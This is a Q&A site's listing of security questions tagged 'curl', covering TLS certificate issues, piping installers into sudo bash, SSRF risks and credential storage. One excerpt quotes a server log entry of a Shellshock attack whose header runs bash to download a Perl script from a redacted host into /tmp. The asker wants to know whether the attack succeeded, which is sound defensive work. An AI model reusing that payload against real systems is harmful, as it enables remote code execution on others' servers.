Questions tagged [curl]

An open source command line utility for transferring data using URL syntax with support for many protocols including FTP, HTTP, HTTPS, various mail protocols (including IMAP, POP3, and SMTP) and others


59 questions

71 votes, 1 answer

Why is there no certificate error while visiting google.net although it presents a certificate issued to google.com?

The following output shows that google.net is presenting a certificate that has been issued to www.google.com. $ openssl s_client -connect google.net:443 < /dev/null > out.txt 2>&1; cat out.txt depth=2 /C=US/O=GeoTrust Inc./CN=GeoTrust Global…
Lone Learner

51 votes, 6 answers

Is `curl {something} | sudo bash -` a reasonably safe installation method?

The most straightforward way to install NodeJS on Ubuntu or Debian seems to be Nodesource, whose installation instructions say to run: curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - This clashes with some basic security rules I…
Krubo

49 votes, 6 answers

How do I safely inspect a potentially malicious website?

Sometimes I'm interested in what's behind a malicious website. How do I stay on the safe side if I decide to inspect? I'm searching for methods that are quicker and more simple than running the website on a virtual machine. Should I use cURL and…
Mirsad

36 votes, 3 answers

Is it insecure to send a password in a `curl` command?

Here’s an example request we can make to the GitHub API: curl 'https://api.github.com/authorizations' --user "USERNAME" This will prompt for the account password, to continue: Enter host password for user 'USERNAME': If we don’t want to get the…
user137369

18 votes, 5 answers

HTTPS connection to specific sites fail with cURL on macOS

On my Mac, HTTPS connections to certain sites fail using the built-in curl binary of macOS 10.14. They work fine with different browsers, as well as other builds of cURL on the same system. One of the affected sites is https://kapeli.com/, the…
F30

14 votes, 2 answers

Is allowing unfiltered curl request from a website a vulnerability?

Recently I was on a website which provided some nonsense feature: Enter a URL Press enter HTML source of a given URL is displayed It basically fetched a URL and just dumped the contents of it. It could be XML, txt, HTML, any reachable path via…
Samuel

8 votes, 1 answer

Shellshock Exploit evidence - is this a successful attack

I was looking through logs today and noticed the following: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl…

7 votes, 2 answers

Is it safe to use .netrc files to store credentials for tools like curl or ftp?

The .netrc file can contain username and password credentials for various sites, to allow simpler invocation of tools. For example curl with the -n option will read credentials from the file, for the given target site. Or FTP does similar. Also…
Cheeso

7 votes, 1 answer

Make server return "Unable to split netmask from target expression"

I'm interested in making my website a lot more secure and, while playing about scanning other websites, I found that one website responds to nmap traceroute, curl and wget console commands in such a manner that it returns the following…
user115493

6 votes, 5 answers

Can a curl request to an arbitrary url made sufficiently safe?

This is a follow up of another topic (Is allowing unfiltered curl request from a website a vulnerability?) on which I am doing some private research. Given: A publicly reachable webservice that accepts any url and performs a curl get request on…
Samuel

5 votes, 2 answers

Certificate works in Chrome + Firefox but not with curl ("unable to get local issuer certificate") with the recent cacert.pem

I am trying to connect to a site behind a firewall, that is why I cannot share the URL for verification. $ curl -vvvv https://example.com:8080/foo/ba/?wsdl --cacert /tmp/cacert-2018-12-05.pem * Trying a.b.c.d... * TCP_NODELAY set * Connected to…
Alex

5 votes, 4 answers

Is it possible to execute a local file or code from cURL?

I wonder if it is possible to execute bash code or a local file from cURL, that is, using the following syntax: curl "local file" I was looking for possible solutions and found that to read the local files of the system can be done with "file://"…
Julián

5 votes, 2 answers

Is there any effective server-side prevention technique against PHP-aided CSRF?

I'm gonna start by saying it: I'm merely a cybersecurity enthusiast, not an expert. Thus, I'm gonna state what I think I know so far, please feel free to correct me at any time. Through my readings, I've come to learn about: The existence of CSRF…
MadWard

4 votes, 1 answer

Which SSL/TLS protocol will use by cURL if not defined?

When using curl against an HTTPS URL without defining the SSL version option, which level of SSL/TLS will be used? From the cURL documentation it says CURL_SSLVERSION_DEFAULT will be used as default. CURL_SSLVERSION_DEFAULT The default action. This will…
Gihan

4 votes, 2 answers

Do browsers and tools send `SNI` field by default connecting to https endpoints?

I am setting up HaProxy for https in passthrough (tcp) mode without SSL/TLS termination. I want to be able to route traffic to different backends based on hostname requested by a client. From HaProxy documentation I learned that there is unencrypted…
Kirill